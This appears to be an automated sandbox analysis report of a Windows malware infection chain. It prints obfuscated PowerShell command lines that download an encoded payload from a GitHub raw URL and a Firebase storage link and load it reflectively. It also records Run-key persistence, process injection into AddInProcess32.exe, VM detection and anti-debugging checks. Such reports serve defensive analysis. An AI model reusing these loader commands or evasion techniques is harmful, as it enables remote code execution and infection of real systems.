                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('B'+'08url = C'+'7Ihttps://ra'+'w.'+'gi'+'thu'+'bu'+'sercont'+'ent'+'.c'+'om/N'+'oDetectO'+'n/NoDe'+'tectOn/refs'+'/h'+'ea'+'d'+'s'+'/'+'m'+'ain/De'+'tahNo'+'th-V'+'.t'+'xtC'+'7I; B0'+'8bas'+'e64C'+'o'+'ntent = (New-Obj'+'ec'+'t System.Net.We'+'bClient).D'+'ownlo'+'ad'+'Str'+'i'+'ng(B'+'08u'+'rl'+'); B0'+'8'+'bina'+'r'+'y'+'C'+'ont'+'ent ='+' [Syst'+'em.Conve'+'rt]::'+'Fr'+'omBase64Strin'+'g('+'B0'+'8ba'+'se64'+'Cont'+'ent); '+'B08assembly '+'= [Refl'+'ec'+'t'+'ion.Assembly]::L'+'oad(B08'+'binaryC'+'o'+'nten'+'t)'+'; [dnlib'+'.I'+'O.H'+'om'+'e'+']::VA'+'I('+'pQ'+'U884e'+'8e0d52'+'f0-'+'e5a'+'b-'+'1'+'164-00c6'+'-aaa2ff5e'+'='+'n'+'e'+'k'+'ot&aidem=tla?tx'+'t'+'.42020170nig'+'irore'+'ivax/o/mo'+'c.'+'topsppa.4202s'+'tpyr'+'c'+'/b/0v'+'/moc'+'.'+'sipaelg'+'oog'+'.e'+'garo'+'t'+'sesab'+'erif'+'//:'+'s'+'pt'+'thpQU,'+' pQU1pQU,'+' pQUC:T'+'4yProgramData'+'T4'+'y'+'pQU, p'+'QUa'+'lcati'+'fap'+'QU, pQUAddInPr'+'ocess3'+'2'+'pQU, pQ'+'UpQU,p'+'QU'+'p'+'QU)') -CrepLaCe ([ChaR]112+[ChaR]81+[ChaR]85),[ChaR]34 -CrepLaCe ([ChaR]67+[ChaR]55+[ChaR]73),[ChaR]39 -RePlAce ([ChaR]66+[ChaR]48+[ChaR]56),[ChaR]36 -RePlAce ([ChaR]84+[ChaR]52+[ChaR]121),[ChaR]92)|.( ([sTRinG]$VeRBoSepreFerENce)[1,3]+'X'-JOin'')"
                  Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KAAoACcAQgAnACsAJwAwADgAdQByAGwAIAA9ACAAQwAnACsAJwA3AEkAaAB0AHQAcABzADoALwAvAHIAYQAnACsAJwB3AC4AJwArACcAZwBpACcAKwAnAHQAaAB1ACcAKwAnAGIAdQAnACsAJwBzAGUAcgBjAG8AbgB0ACcAKwAnAGUAbgB0ACcAKwAnAC4AYwAnACsAJwBvAG0ALwBOACcAKwAnAG8ARABlAHQAZQBjAHQATwAnACsAJwBuAC8ATgBvAEQAZQAnACsAJwB0AGUAYwB0AE8AbgAvAHIAZQBmAHMAJwArACcALwBoACcAKwAnAGUAYQAnACsAJwBkACcAKwAnAHMAJwArACcALwAnACsAJwBtACcAKwAnAGEAaQBuAC8ARABlACcAKwAnAHQAYQBoAE4AbwAnACsAJwB0AGgALQBWACcAKwAnAC4AdAAnACsAJwB4AHQAQwAnACsAJwA3AEkAOwAgAEIAMAAnACsAJwA4AGIAYQBzACcAKwAnAGUANgA0AEMAJwArACcAbwAnACsAJwBuAHQAZQBuAHQAIAA9ACAAKABOAGUAdwAtAE8AYgBqACcAKwAnAGUAYwAnACsAJwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQAnACsAJwBiAEMAbABpAGUAbgB0ACkALgBEACcAKwAnAG8AdwBuAGwAbwAnACsAJwBhAGQAJwArACcAUwB0AHIAJwArACcAaQAnACsAJwBuAGcAKABCACcAKwAnADAAOAB1ACcAKwAnAHIAbAAnACsAJwApADsAIABCADAAJwArACcAOAAnACsAJwBiAGkAbgBhACcAKwAnAHIAJwArACcAeQAnACsAJwBDACcAKwAnAG8AbgB0ACcAKwAnAGUAbgB0ACAAPQAnACsAJwAgAFsAUwB5AHMAdAAnACsAJwBlAG0ALgBDAG8AbgB2AGUAJwArACcAcgB0AF0AOgA6ACcAKwAnAEYAcgAnACsAJwBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuACcAKwAnAGcAKAAnACsAJwBCADAAJwArACcAOABiAGEAJwArACcAcwBlADYANAAnACsAJwBDAG8AbgB0ACcAKwAnAGUAbgB0ACkAOwAgACcAKwAnAEIAMAA4AGEAcwBzAGUAbQBiAGwAeQAgACcAKwAnAD0AIABbAFIAZQBmAGwAJwArACcAZQBjACcAKwAnAHQAJwArACcAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATAAnACsAJwBvAGEAZAAoAEIAMAA4ACcAKwAnAGIAaQBuAGEAcgB5AEMAJwArACcAbwAnACsAJwBuAHQAZQBuACcAKwAnAHQAKQAnACsAJwA7ACAAWwBkAG4AbABpAGIAJwArACcALgBJACcAKwAnAE8ALgBIACcAKwAnAG8AbQAnACsAJwBlACcAKwAnAF0AOgA6AFYAQQAnACsAJwBJACgAJwArACcAcABRACcAKwAnAFUAOAA4ADQAZQAnACsAJwA4AGUAMABkADUAMgAnACsAJwBmADAALQAnACsAJwBlADUAYQAnACsAJwBiAC0AJwArACcAMQAnACsAJwAxADYANAAtADAAMABjADYAJwArACcALQBhAGEAYQAyAGYAZgA1AGUAJwArACcAPQAnACsAJwBuACcAKwAnAGUAJwArACcAawAnACsAJwBvAHQAJgBhAGkAZABlAG0APQB0AGwAYQA/AHQAeAAnACsAJwB0ACcAKwAnAC4ANAAyADAAMgAwADEANwAwAG4AaQBnACcAKwAnAGkAcgBvAHIAZQAnACsAJwBpAHYAYQB4AC8AbwAvAG0AbwAnACsAJwBjAC4AJwArACcAdABvAHAAcwBwAHAAYQAuADQAMgAwADIAcwAnACsAJwB0AHAAeQByACcAKwAnAGMAJwArACcALwBiAC8AMAB2ACcAKwAnAC8AbQBvAGMAJwArACcALgAnACsAJwBzAGkAcABhAGUAbABnACcAKwAnAG8AbwBnACcAKwAnAC4AZQAnACsAJwBnAGEAcgBvACcAKwAnAHQAJwArACcAcwBlAHMAYQBiACcAKwAnAGUAcgBpAGYAJwArACcALwAvADoAJwArACcAcwAnACsAJwBwAHQAJwArACcAdABoAHAAUQBVACwAJwArACcAIABwAFEAVQAxAHAAUQBVACwAJwArACcAIABwAFEAVQBDADoAVAAnACsAJwA0AHkAUAByAG8AZwByAGEAbQBEAGEAdABhACcAKwAnAFQANAAnACsAJwB5ACcAKwAnAHAAUQBVACwAIABwACcAKwAnAFEAVQBhACcAKwAnAGwAYwBhAHQAaQAnACsAJwBmAGEAcAAnACsAJwBRAFUALAAgAHAAUQBVAEEAZABkAEkAbgBQAHIAJwArACcAbwBjAGUAcwBzADMAJwArACcAMgAnACsAJwBwAFEAVQAsACAAcABRACcAKwAnAFUAcABRAFUALABwACcAKwAnAFEAVQAnACsAJwBwACcAKwAnAFEAVQApACcAKQAgACAALQBDAHIAZQBwAEwAYQBDAGUAIAAoAFsAQwBoAGEAUgBdADEAMQAyACsAWwBDAGgAYQBSAF0AOAAxACsAWwBDAGgAYQBSAF0AOAA1ACkALABbAEMAaABhAFIAXQAzADQAIAAgAC0AQwByAGUAcABMAGEAQwBlACAAIAAoAFsAQwBoAGEAUgBdADYANwArAFsAQwBoAGEAUgBdADUANQArAFsAQwBoAGEAUgBdADcAMwApACwAWwBDAGgAYQBSAF0AMwA5ACAAIAAtAFIAZQBQAG
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 11_2_00007FFAAC388156 push esp; iretd 11_2_00007FFAAC38815C
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 11_2_00007FFAAC387567 push ebx; iretd 11_2_00007FFAAC38756A
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 11_2_00007FFAAC387820 push eax; iretd 11_2_00007FFAAC38786D
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 11_2_00007FFAAC387850 push eax; iretd 11_2_00007FFAAC38786D

                  Persistence and Installation Behavior

                  Source: C:\Windows\System32\cmd.exe File created: C:\ProgramData\alcatifa.vbs

                  Boot Survival

                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Path C:\ProgramData\alcatifa.vbs
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Path
                  Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  Source: global traffic | HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 | Host: ip-api.com | Connection: Keep-Alive
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                  Source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000E.00000002.2549002759.0000000000402000.00000040.00000400.00020000.00000000.sdmp, AddInProcess32.exe, 0000000E.00000002.2553669358.0000000002B05000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000E.00000002.2553669358.0000000002BB0000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: SBIEDLL.DLL
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Memory allocated: 28F0000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Memory allocated: 2AD0000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Memory allocated: 4AD0000 memory reserve | memory write watch
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477 (2 occurrences)
                  Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer (3 occurrences)
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1186
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1779
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4772
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5038
                  Source: C:\Windows\System32\wscript.exe TID: 5648 | Thread sleep time: -30000s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3632 | Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7224 | Thread sleep count: 4772 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7228 | Thread sleep count: 5038 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7264 | Thread sleep time: -18446744073709540s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477 (2 occurrences)
                  Source: wscript.exe, 00000010.00000003.1518730090.000001C6D6811000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000010.00000003.1518938557.000001C6D6211000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000010.00000003.1490326369.000001C6D6415000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000010.00000003.1519148651.000001C6D6611000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000011.00000003.1598119715.0000020092096000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000011.00000003.1573280225.0000020091C95000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000011.00000003.1599185703.0000020091E91000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000011.00000003.1599019680.0000020091A91000.00000004.00000020.00020000.00000000.sdmp, alcatifa.vbs.12.dr | Binary or memory string: cmd = "cmd /c wevtutil epl ""Microsoft-Windows-Hyper-V-VMMS-Networking"" " & vmmslogFileName
                  Source: wscript.exe, 00000000.00000003.1274196204.000001D52EE90000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \VMware\*.dmp@a
                  Source: AddInProcess32.exe, 0000000E.00000002.2553669358.0000000002BB0000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: VMware
                  Source: alcatifa.vbs.12.dr | Binary or memory string: "$output += ""(Get-VMNetworkAdapter -all)""; " & _
                  Source: wscript.exe, 00000000.00000003.1274196204.000001D52EE90000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \Global_Config\VMware Server\SSL@cNR
                  Source: AddInProcess32.exe, 0000000E.00000002.2553669358.0000000002BB0000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: vmware
                  Source: wscript.exe, 00000010.00000003.1491382989.000001C6D6363000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000010.00000003.1490602929.000001C6D635C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: @cmd /c wevtutil epl "Microsoft-Windows-Hyper-V-VMMS-Networking" end sel(q6
                  Source: wscript.exe, 00000000.00000003.1274421497.000001D52EECF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: fso.CopyFile(appDirs[i] + "\\VMware\\*.dmp", teorizar + "\\Dumps\\");
                  Source: wscript.exe, 00000000.00000003.1274421497.000001D52EECF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \VMware\*.dmp
                  Source: wscript.exe, 00000011.00000003.1573494529.0000020091BDD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000011.00000003.1574053394.0000020091BE4000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ssio@cmd /c wevtutil epl "Microsoft-Windows-Hyper-V-VMMS-Networking" putXml
                  Source: wscript.exe, 00000011.00000003.1574053394.0000020091BE4000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ingl*$output += "(Get-VMNetworkAdapter -all)"; eByXpa
                  Source: wscript.exe, 00000010.00000003.1518730090.000001C6D6811000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000010.00000003.1518938557.000001C6D6211000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000010.00000003.1490326369.000001C6D6415000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000010.00000003.1519148651.000001C6D6611000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000011.00000003.1598119715.0000020092096000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000011.00000003.1573280225.0000020091C95000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000011.00000003.1599185703.0000020091E91000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000011.00000003.1599019680.0000020091A91000.00000004.00000020.00020000.00000000.sdmp, alcatifa.vbs.12.dr | Binary or memory string: cmd = "cmd /c wevtutil epl System /q:""*[System[Provider[@Name='Microsoft-Windows-Hyper-V-VmSwitch']]]"" " & vmswitchlogFileName
                  Source: wscript.exe, 00000010.00000003.1491382989.000001C6D6363000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000010.00000003.1490602929.000001C6D635C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: iJBJEC`cmd /c wevtutil epl System /q:"*[System[Provider[@Name='Microsoft-Windows-Hyper-V-VmSwitch']]]" eturnObjec
                  Source: AddInProcess32.exe, 0000000E.00000002.2549002759.0000000000402000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: VMwareVBoxESelect * from Win32_ComputerSystem
                  Source: wscript.exe, 00000000.00000003.1275206400.000001D52D4C7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1275992535.000001D52D4C6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1517566590.000001D52D477000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1520881773.000001D52D4C9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1277153379.000001D52D4C8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1516476702.000001D52D4C9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1516335318.000001D52D4C8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1516670838.000001D52D4C9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1520494676.000001D52D47D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                  Source: wscript.exe, 00000010.00000003.1490602929.000001C6D635C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: eded*$output += "(Get-VMNetworkAdapter -all)"; t cmdl
                  Source: wscript.exe, 00000000.00000003.1274421497.000001D52EECF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: fso.DeleteFolder(teorizar + "\\Global_Config\\VMware Server\\SSL");
                  Source: wscript.exe, 00000011.00000003.1573494529.0000020091BDD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000011.00000003.1574053394.0000020091BE4000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: iJsisI`cmd /c wevtutil epl System /q:"*[System[Provider[@Name='Microsoft-Windows-Hyper-V-VmSwitch']]]" analys
                  Source: powershell.exe, 0000000B.00000002.1467476371.0000027D758F0000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 0000000E.00000002.2558087878.00000000057C5000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: wscript.exe, 00000000.00000003.1274421497.000001D52EECF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: I@\Global_Config\VMware Server\SSLcNR
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation

                  Anti Debugging

                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 14_2_02937070 CheckRemoteDebuggerPresent, 14_2_02937070
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Process queried: DebugPort
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Memory allocated: page read and write | page guard

                  HIPS / PFW / Operating System Protection Evasion

                  Source: C:\Windows\System32\wscript.exe | Network Connect: 188.114.97.3 443
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5A
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 402000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 43E000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 440000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 91D008
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 